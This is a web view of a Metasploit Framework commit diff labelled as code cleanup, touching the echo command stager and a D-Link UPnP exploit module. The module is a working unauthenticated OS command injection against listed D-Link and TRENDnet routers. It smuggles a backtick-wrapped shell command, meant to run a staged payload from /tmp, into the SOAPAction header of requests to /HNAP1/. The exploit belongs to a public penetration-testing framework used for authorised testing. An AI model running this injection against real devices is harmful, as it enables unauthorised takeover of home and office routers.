infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-05-29 14:45:47 -05:00
parent 666b0bc34a
commit 8b2e49eabc
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 19 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
lib/rex/exploitation/cmdstager/echo.rb
View File

@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase
# and initialize opts[:enc_format].
#
def generate(opts = {})
if opts[:temp] == false
opts[:temp] = ''
else
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, "/")
opts[:temp] = opts[:temp] || '/tmp/'
unless opts[:temp].empty?
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
end

32
modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
View File

@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected:
DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'unix',
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
]
],
'DefaultTarget' => 0
))
@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = '/HNAP1/'
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soapaction,
},
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:temp => false
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soapaction,
},
},1)
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end